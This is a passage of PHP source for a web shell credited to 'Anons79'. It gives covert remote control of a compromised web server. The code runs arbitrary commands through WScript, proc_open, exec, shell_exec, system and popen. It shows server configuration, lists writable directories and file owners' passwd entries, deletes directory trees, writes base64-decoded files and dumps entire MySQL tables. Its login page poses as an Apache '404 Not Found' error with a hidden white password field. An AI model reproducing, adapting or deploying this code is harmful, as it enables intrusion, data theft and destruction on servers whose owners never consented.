1419 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1420 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1421 }
1422 p('<p>');
1423 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1424 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1425 p('</p>');
1426 formfoot();
1427 if ($command) {
1428 p('<hr width="100%" noshade /><pre>');
1429 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1430 $wsh = new COM('WScript.shell');
1431 $exec = $wsh->exec('cmd.exe /c ' . $command);
1432 $stdout = $exec->StdOut();
1433 $stroutput = $stdout->ReadAll();
1434 echo $stroutput;
1435 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1436 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1437 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1438 if (is_resource($process)) {
1439 fwrite($pipes[0], $command . "\r\n");
1440 fwrite($pipes[0], "exit\r\n");
1441 fclose($pipes[0]);
1442 while (!feof($pipes[1])) {
1443 echo fgets($pipes[1], 1024);
1444 }
1445 fclose($pipes[1]);
1446 while (!feof($pipes[2])) {
1447 echo fgets($pipes[2], 1024);
1448 }
1449 fclose($pipes[2]);
1450 proc_close($process);
1451 }
1452 } else {
1453 echo (execute($command));
1454 }
1455 p('</pre>');
1456 }
1457} //end shell
1458elseif ($action == 'phpenv') {
1459 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1460 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1461 !$dis_func && $dis_func = 'No';
1462 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1463 if ($phpvarname) {
1464 m($phpvarname . ' : ' . getcfg($phpvarname));
1465 }
1466 formhead(array('title' => 'Server environment'));
1467 makehide('action', 'phpenv');
1468 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1469 formfooter();
1470 $hp = array(0 => 'Server', 1 => 'PHP');
1471 for ($a = 0;$a < 2;$a++) {
1472 p('<h2>' . $hp[$a] . ' »</h2>');
1473 p('<ul class="info">');
1474 if ($a == 0) {
1475 for ($i = 1;$i <= 9;$i++) {
1476 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1477 }
1478 } elseif ($a == 1) {
1479 for ($i = 10;$i <= 23;$i++) {
1480 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1481 }
1482 }
1483 p('</ul>');
1484 }
1485} //end phpenv
1486else {
1487 m('Undefined Action');
1488}
1489?>
1490</td></tr></table>
1491<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1492 <span style="float:right;"><?php debuginfo();
1493ob_end_flush(); ?></span>
1494 Copyright (C) 2016 <B></B> - Developed by <a href=https://www.facebook.com/anons79 target=_blank><B>Anons79 </B></a> - <B>- Anons79 </B> All Rights Reserved.
1495</div>
1496</body>
1497</html>
1498
1499<?php
1500/*======================================================
1501Show info shell
1502======================================================*/
1503function m($msg) {
1504 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1505 echo $msg;
1506 echo '</div>';
1507}
1508function scookie($key, $value, $life = 0, $prefix = 1) {
1509 global $admin, $timestamp, $_SERVER;
1510 $key = ($prefix ? $admin['cookiepre'] : '') . $key;
1511 $life = $life ? $life : $admin['cookielife'];
1512 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1513 setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1514}
1515function multi($num, $perpage, $curpage, $tablename) {
1516 $multipage = '';
1517 if ($num > $perpage) {
1518 $page = 10;
1519 $offset = 5;
1520 $pages = @ceil($num / $perpage);
1521 if ($page > $pages) {
1522 $from = 1;
1523 $to = $pages;
1524 } else {
1525 $from = $curpage - $offset;
1526 $to = $curpage + $page - $offset - 1;
1527 if ($from < 1) {
1528 $to = $curpage + 1 - $from;
1529 $from = 1;
1530 if (($to - $from) < $page && ($to - $from) < $pages) {
1531 $to = $page;
1532 }
1533 } elseif ($to > $pages) {
1534 $from = $curpage - $pages + $to;
1535 $to = $pages;
1536 if (($to - $from) < $page && ($to - $from) < $pages) {
1537 $from = $pages - $page + 1;
1538 }
1539 }
1540 }
1541 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
1542 for ($i = $from;$i <= $to;$i++) {
1543 $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
1544 }
1545 $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
1546 $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
1547 }
1548 return $multipage;
1549}
1550// Login page
1551function loginpage() {
1552?>
1553<html>
1554<head>
1555<body>
1556 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1557<title>404 Not Found</title>
1558<style type="text/css">
1559 A:link {text-decoration: none; color: green }
1560 A:visited {text-decoration: none;color:red}
1561 A:active {text-decoration: none}
1562 A:hover {text-decoration: underline; color: green;}
1563 input, textarea, button
1564 {
1565 font-size: 11pt;
1566 color: #FFFFFF;
1567 font-family: verdana, sans-serif;
1568 background-color: #FFFFFF;
1569 border-left: 2px dashed #FFFFFF;
1570 border-top: 2px dashed #FFFFFF;
1571 border-right: 2px dashed #FFFFFF;
1572 border-bottom: 2px dashed #FFFFFF;
1573 }
1574 <style type="text/css">
1575 A:link {text-decoration: none; color: green }
1576 A:visited {text-decoration: none;color:red}
1577 A:active {text-decoration: none}
1578 A:hover {text-decoration: underline; color: green;}
1579 input, textarea, button
1580 {
1581 font-size: 11pt;
1582 color: #FFFFFF;
1583 font-family: verdana, sans-serif;
1584 background-color: #ffffff;
1585 border-left: 2px dashed #FFFFFF;
1586 border-top: 2px dashed #FFFFFF;
1587 border-right: 2px dashed #FFFFFF;
1588 border-bottom: 2px dashed #FFFFFF;
1589 outline:none;
1590 }
1591 </style>
1592 <h1>Not Found</h1>
1593<p>The requested URL <?=$_SERVER['REQUEST_URI'] ?> was not found on this server.</p>
1594<p>Additionally, a 404 Not Found
1595error was encountered while trying to use an ErrorDocument to handle the request.</p>
1596<hr>
1597<address>Apache/2 Server at <?=$_SERVER['SERVER_NAME'] ?> Port 80</address>
1598<center><form method="POST" action="">
1599 <input name="password" type="password" style="border: 0; background: white;">
1600 <input type="hidden" name="doing" value="login">
1601 <input type="submit" value="Login" style="border: 0; color: white; background-color: white;">
1602 </form></center>
1603<BR>
1604<?php
1605 echo "" . $err_mess . "";
1606?>
1607
1608 <B><font color=red>
1609
1610
1611
1612
1613
1614
1615</div>
1616
1617
1618 </fieldset>
1619
1620
1621
1622</head>
1623</html>
1624
1625
1626<?php
1627 exit;
1628} //end loginpage()
1629function execute($cfe) {
1630 $res = '';
1631 if ($cfe) {
1632 if (function_exists('exec')) {
1633 @exec($cfe, $res);
1634 $res = join("\n", $res);
1635 } elseif (function_exists('shell_exec')) {
1636 $res = @shell_exec($cfe);
1637 } elseif (function_exists('system')) {
1638 @ob_start();
1639 @system($cfe);
1640 $res = @ob_get_contents();
1641 @ob_end_clean();
1642 } elseif (function_exists('passthru')) {
1643 @ob_start();
1644 @passthru($cfe);
1645 $res = @ob_get_contents();
1646 @ob_end_clean();
1647 } elseif (@is_resource($f = @popen($cfe, "r"))) {
1648 $res = '';
1649 while (!@feof($f)) {
1650 $res.= @fread($f, 1024);
1651 }
1652 @pclose($f);
1653 }
1654 }
1655 return $res;
1656}
1657function which($pr) {
1658 $path = execute("which $pr");
1659 return ($path ? $path : $pr);
1660}
1661function cf($fname, $text) {
1662 if ($fp = @fopen($fname, 'w')) {
1663 @fputs($fp, base64_decode($text));
1664 @fclose($fp);
1665 }
1666}
1667// Debug
1668function debuginfo() {
1669 global $starttime;
1670 $mtime = explode(' ', microtime());
1671 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1672 echo 'Processed in ' . $totaltime . ' second(s)';
1673}
1674// Function connect database
1675function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
1676 if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
1677 p('<h2>Can not connect to MySQL server</h2>');
1678 exit;
1679 }
1680 if ($link && $dbname) {
1681 if (!@mysql_select_db($dbname, $link)) {
1682 p('<h2>Database selected has error</h2>');
1683 exit;
1684 }
1685 }
1686 if ($link && mysql_get_server_info() > '4.1') {
1687 if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1688 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1689 }
1690 }
1691 return $link;
1692}
1693// Array strip
1694function s_array(&$array) {
1695 if (is_array($array)) {
1696 foreach ($array as $k => $v) {
1697 $array[$k] = s_array($v);
1698 }
1699 } else if (is_string($array)) {
1700 $array = stripslashes($array);
1701 }
1702 return $array;
1703}
1704// HTML Strip
1705function html_clean($content) {
1706 $content = htmlspecialchars($content);
1707 $content = str_replace("\n", "<br />", $content);
1708 $content = str_replace(" ", " ", $content);
1709 $content = str_replace("\t", " ", $content);
1710 return $content;
1711}
1712// Chmod
1713function getChmod($filepath) {
1714 return substr(base_convert(@fileperms($filepath), 10, 8), -4);
1715}
1716function getPerms($filepath) {
1717 $mode = @fileperms($filepath);
1718 if (($mode & 0xC000) === 0xC000) {
1719 $type = 's';
1720 } elseif (($mode & 0x4000) === 0x4000) {
1721 $type = 'd';
1722 } elseif (($mode & 0xA000) === 0xA000) {
1723 $type = 'l';
1724 } elseif (($mode & 0x8000) === 0x8000) {
1725 $type = '-';
1726 } elseif (($mode & 0x6000) === 0x6000) {
1727 $type = 'b';
1728 } elseif (($mode & 0x2000) === 0x2000) {
1729 $type = 'c';
1730 } elseif (($mode & 0x1000) === 0x1000) {
1731 $type = 'p';
1732 } else {
1733 $type = '?';
1734 }
1735 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1736 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1737 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1738 $group['read'] = ($mode & 00040) ? 'r' : '-';
1739 $group['write'] = ($mode & 00020) ? 'w' : '-';
1740 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1741 $world['read'] = ($mode & 00004) ? 'r' : '-';
1742 $world['write'] = ($mode & 00002) ? 'w' : '-';
1743 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1744 if ($mode & 0x800) {
1745 $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
1746 }
1747 if ($mode & 0x400) {
1748 $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
1749 }
1750 if ($mode & 0x200) {
1751 $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
1752 }
1753 return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
1754}
1755function getUser($filepath) {
1756 if (function_exists('posix_getpwuid')) {
1757 $array = @posix_getpwuid(@fileowner($filepath));
1758 if ($array && is_array($array)) {
1759 return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
1760 }
1761 }
1762 return '';
1763}
1764// Delete dir
1765function deltree($deldir) {
1766 $mydir = @dir($deldir);
1767 while ($file = $mydir->read()) {
1768 if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
1769 @chmod($deldir . '/' . $file, 0777);
1770 deltree($deldir . '/' . $file);
1771 }
1772 if (is_file($deldir . '/' . $file)) {
1773 @chmod($deldir . '/' . $file, 0777);
1774 @unlink($deldir . '/' . $file);
1775 }
1776 }
1777 $mydir->close();
1778 @chmod($deldir, 0777);
1779 return @rmdir($deldir) ? 1 : 0;
1780}
1781// Background
1782function bg() {
1783 global $bgc;
1784 return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
1785}
1786// Get path
1787function getPath($scriptpath, $nowpath) {
1788 if ($nowpath == '.') {
1789 $nowpath = $scriptpath;
1790 }
1791 $nowpath = str_replace('\\', '/', $nowpath);
1792 $nowpath = str_replace('//', '/', $nowpath);
1793 if (substr($nowpath, -1) != '/') {
1794 $nowpath = $nowpath . '/';
1795 }
1796 return $nowpath;
1797}
1798// Get up path
1799function getUpPath($nowpath) {
1800 $pathdb = explode('/', $nowpath);
1801 $num = count($pathdb);
1802 if ($num > 2) {
1803 unset($pathdb[$num - 1], $pathdb[$num - 2]);
1804 }
1805 $uppath = implode('/', $pathdb) . '/';
1806 $uppath = str_replace('//', '/', $uppath);
1807 return $uppath;
1808}
1809// Config
1810function getcfg($varname) {
1811 $result = get_cfg_var($varname);
1812 if ($result == 0) {
1813 return 'No';
1814 } elseif ($result == 1) {
1815 return 'Yes';
1816 } else {
1817 return $result;
1818 }
1819}
1820// Function name
1821function getfun($funName) {
1822 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1823}
1824function GetList($dir) {
1825 global $dirdata, $j, $nowpath;
1826 !$j && $j = 1;
1827 if ($dh = opendir($dir)) {
1828 while ($file = readdir($dh)) {
1829 $f = str_replace('//', '/', $dir . '/' . $file);
1830 if ($file != '.' && $file != '..' && is_dir($f)) {
1831 if (is_writable($f)) {
1832 $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
1833 $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
1834 $dirdata[$j]['dirchmod'] = getChmod($f);
1835 $dirdata[$j]['dirperm'] = getPerms($f);
1836 $dirdata[$j]['dirlink'] = ue($dir);
1837 $dirdata[$j]['server_link'] = $f;
1838 $dirdata[$j]['client_link'] = ue($f);
1839 $j++;
1840 }
1841 GetList($f);
1842 }
1843 }
1844 closedir($dh);
1845 clearstatcache();
1846 return $dirdata;
1847 } else {
1848 return array();
1849 }
1850}
1851function qy($sql) {
1852 //echo $sql.'<br>';
1853 $res = $error = '';
1854 if (!$res = @mysql_query($sql)) {
1855 return 0;
1856 } else if (is_resource($res)) {
1857 return 1;
1858 } else {
1859 return 2;
1860 }
1861 return 0;
1862}
1863function q($sql) {
1864 return @mysql_query($sql);
1865}
1866function fr($qy) {
1867 mysql_free_result($qy);
1868}
1869function sizecount($size) {
1870 if ($size > 1073741824) {
1871 $size = round($size / 1073741824 * 100) / 100 . ' G';
1872 } elseif ($size > 1048576) {
1873 $size = round($size / 1048576 * 100) / 100 . ' M';
1874 } elseif ($size > 1024) {
1875 $size = round($size / 1024 * 100) / 100 . ' K';
1876 } else {
1877 $size = $size . ' B';
1878 }
1879 return $size;
1880}
1881// Zip
1882class PHPZip {
1883 var $out = '';
1884 function PHPZip($dir) {
1885 if (@function_exists('gzcompress')) {
1886 $curdir = getcwd();
1887 if (is_array($dir)) $filelist = $dir;
1888 else {
1889 $filelist = $this->GetFileList($dir); //File list
1890 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
1891 }
1892 if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
1893 else chdir($curdir);
1894 if (count($filelist) > 0) {
1895 foreach ($filelist as $filename) {
1896 if (is_file($filename)) {
1897 $fd = fopen($filename, 'r');
1898 $content = @fread($fd, filesize($filename));
1899 fclose($fd);
1900 if (is_array($dir)) $filename = basename($filename);
1901 $this->addFile($content, $filename);
1902 }
1903 }
1904 $this->out = $this->file();
1905 chdir($curdir);
1906 }
1907 return 1;
1908 } else return 0;
1909 }
1910 // Show file list
1911 function GetFileList($dir) {
1912 static $a;
1913 if (is_dir($dir)) {
1914 if ($dh = opendir($dir)) {
1915 while ($file = readdir($dh)) {
1916 if ($file != '.' && $file != '..') {
1917 $f = $dir . '/' . $file;
1918 if (is_dir($f)) $this->GetFileList($f);
1919 $a[] = $f;
1920 }
1921 }
1922 closedir($dh);
1923 }
1924 }
1925 return $a;
1926 }
1927 var $datasec = array();
1928 var $ctrl_dir = array();
1929 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1930 var $old_offset = 0;
1931 function unix2DosTime($unixtime = 0) {
1932 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1933 if ($timearray['year'] < 1980) {
1934 $timearray['year'] = 1980;
1935 $timearray['mon'] = 1;
1936 $timearray['mday'] = 1;
1937 $timearray['hours'] = 0;
1938 $timearray['minutes'] = 0;
1939 $timearray['seconds'] = 0;
1940 } // end if
1941 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1942 }
1943 function addFile($data, $name, $time = 0) {
1944 $name = str_replace('\\', '/', $name);
1945 $dtime = dechex($this->unix2DosTime($time));
1946 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1947 eval('$hexdtime = "' . $hexdtime . '";');
1948 $fr = "\x50\x4b\x03\x04";
1949 $fr.= "\x14\x00";
1950 $fr.= "\x00\x00";
1951 $fr.= "\x08\x00";
1952 $fr.= $hexdtime;
1953 $unc_len = strlen($data);
1954 $crc = crc32($data);
1955 $zdata = gzcompress($data);
1956 $c_len = strlen($zdata);
1957 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1958 $fr.= pack('V', $crc);
1959 $fr.= pack('V', $c_len);
1960 $fr.= pack('V', $unc_len);
1961 $fr.= pack('v', strlen($name));
1962 $fr.= pack('v', 0);
1963 $fr.= $name;
1964 $fr.= $zdata;
1965 $fr.= pack('V', $crc);
1966 $fr.= pack('V', $c_len);
1967 $fr.= pack('V', $unc_len);
1968 $this->datasec[] = $fr;
1969 $new_offset = strlen(implode('', $this->datasec));
1970 $cdrec = "\x50\x4b\x01\x02";
1971 $cdrec.= "\x00\x00";
1972 $cdrec.= "\x14\x00";
1973 $cdrec.= "\x00\x00";
1974 $cdrec.= "\x08\x00";
1975 $cdrec.= $hexdtime;
1976 $cdrec.= pack('V', $crc);
1977 $cdrec.= pack('V', $c_len);
1978 $cdrec.= pack('V', $unc_len);
1979 $cdrec.= pack('v', strlen($name));
1980 $cdrec.= pack('v', 0);
1981 $cdrec.= pack('v', 0);
1982 $cdrec.= pack('v', 0);
1983 $cdrec.= pack('v', 0);
1984 $cdrec.= pack('V', 32);
1985 $cdrec.= pack('V', $this->old_offset);
1986 $this->old_offset = $new_offset;
1987 $cdrec.= $name;
1988 $this->ctrl_dir[] = $cdrec;
1989 }
1990 function file() {
1991 $data = implode('', $this->datasec);
1992 $ctrldir = implode('', $this->ctrl_dir);
1993 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1994 }
1995}
1996// Dump mysql
1997function sqldumptable($table, $fp = 0) {
1998 $tabledump = "DROP TABLE IF EXISTS $table;\n";
1999 $tabledump.= "CREATE TABLE $table (\n";
2000 $firstfield = 1;
2001 $fields = q("SHOW FIELDS FROM $table");
2002 while ($field = mysql_fetch_array($fields)) {
2003 if (!$firstfield) {
2004 $tabledump.= ",\n";
2005 } else {
2006 $firstfield = 0;
2007 }
2008 $tabledump.= " $field[Field] $field[Type]";
2009 if (!empty($field["Default"])) {
2010 $tabledump.= " DEFAULT '$field[Default]'";
2011 }
2012 if ($field['Null'] != "YES") {
2013 $tabledump.= " NOT NULL";
2014 }
2015 if ($field['Extra'] != "") {
2016 $tabledump.= " $field[Extra]";
2017 }
2018 }
2019 fr($fields);
2020 $keys = q("SHOW KEYS FROM $table");
2021 while ($key = mysql_fetch_array($keys)) {
2022 $kname = $key['Key_name'];
2023 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2024 $kname = "UNIQUE|$kname";
2025 }
2026 if (!is_array($index[$kname])) {
2027 $index[$kname] = array();
2028 }
2029 $index[$kname][] = $key['Column_name'];
2030 }
2031 fr($keys);
2032 while (list($kname, $columns) = @each($index)) {
2033 $tabledump.= ",\n";
2034 $colnames = implode($columns, ",");
2035 if ($kname == "PRIMARY") {
2036 $tabledump.= " PRIMARY KEY ($colnames)";
2037 } else {
2038 if (substr($kname, 0, 6) == "UNIQUE") {
2039 $kname = substr($kname, 7);
2040 }
2041 $tabledump.= " KEY $kname ($colnames)";
2042 }
2043 }
2044 $tabledump.= "\n);\n\n";
2045 if ($fp) {
2046 fwrite($fp, $tabledump);
2047 } else {
2048 echo $tabledump;
2049 }
2050 $rows = q("SELECT * FROM $table");
2051 $numfields = mysql_num_fields($rows);
2052 while ($row = mysql_fetch_array($rows)) {
2053 $tabledump = "INSERT INTO $table VALUES(";
2054 $fieldcounter = - 1;
2055 $firstfield = 1;
2056 while (++$fieldcounter < $numfields) {
2057 if (!$firstfield) {
2058 $tabledump.= ", ";
2059 } else {
2060 $firstfield = 0;
2061 }
2062 if (!isset($row[$fieldcounter])) {
2063 $tabledump.= "NULL";
2064 } else {
2065 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2066 }
2067 }
2068 $tabledump.= ");\n";
2069 if ($fp) {
2070 fwrite($fp, $tabledump);
2071 } else {
2072 echo $tabledump;
2073 }
2074 }
2075 fr($rows);
2076 if ($fp) {
2077 fwrite($fp, "\n");
2078 } else {
2079 echo "\n";
2080 }
2081}
2082function ue($str) {
2083 return urlencode($str);
2084}
2085function p($str) {
2086 echo $str . "\n";
2087}
2088function tbhead() {
2089 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2090}
2091function tbfoot() {
2092 p('</table>');
2093}
2094function makehide($name, $value = '') {
2095 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2096}
2097function makeinput($arg = array()) {
2098 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2099 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2100 !$arg['type'] && $arg['type'] = 'text';
2101 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2102 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2103 if ($arg['newline']) {
2104 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2105 } else {
2106 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2107 }
2108}
2109function makeselect($arg = array()) {
2110 if ($arg['onchange']) {
2111 $onchange = 'onchange="' . $arg['onchange'] . '"';
2112 }
2113 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2114 if ($arg['newline']) p('<p>');
2115 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2116 if (is_array($arg['option'])) {
2117 foreach ($arg['option'] as $key => $value) {
2118 if ($arg['selected'] == $key) {
2119 p("<option value=\"$key\" selected>$value</option>");
2120 } else {
2121 p("<option value=\"$key\">$value</option>");
2122 }
2123 }
2124 }
2125 p("</select>");
2126 if ($arg['newline']) p('</p>');
2127}
2128function formhead($arg = array()) {
2129 !$arg['method'] && $arg['method'] = 'post';
2130 !$arg['action'] && $arg['action'] = $self;
2131 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2132 !$arg['name'] && $arg['name'] = 'form1';
2133 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2134 if ($arg['title']) {
2135 p('<h2>' . $arg['title'] . ' »</h2>');
2136 }
2137}
2138function maketext($arg = array()) {
2139 !$arg['cols'] && $arg['cols'] = 100;
2140 !$arg['rows'] && $arg['rows'] = 25;
2141 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2142 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2143}
2144function formfooter($name = '') {
2145 !$name && $name = 'submit';
2146 p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2147 p('</form>');
2148}
2149function formfoot() {
2150 p('</form>');
2151}
2152// Exit
2153function pr($a) {
2154 echo '<pre>';
2155 print_r($a);
2156 echo '</pre>';
2157}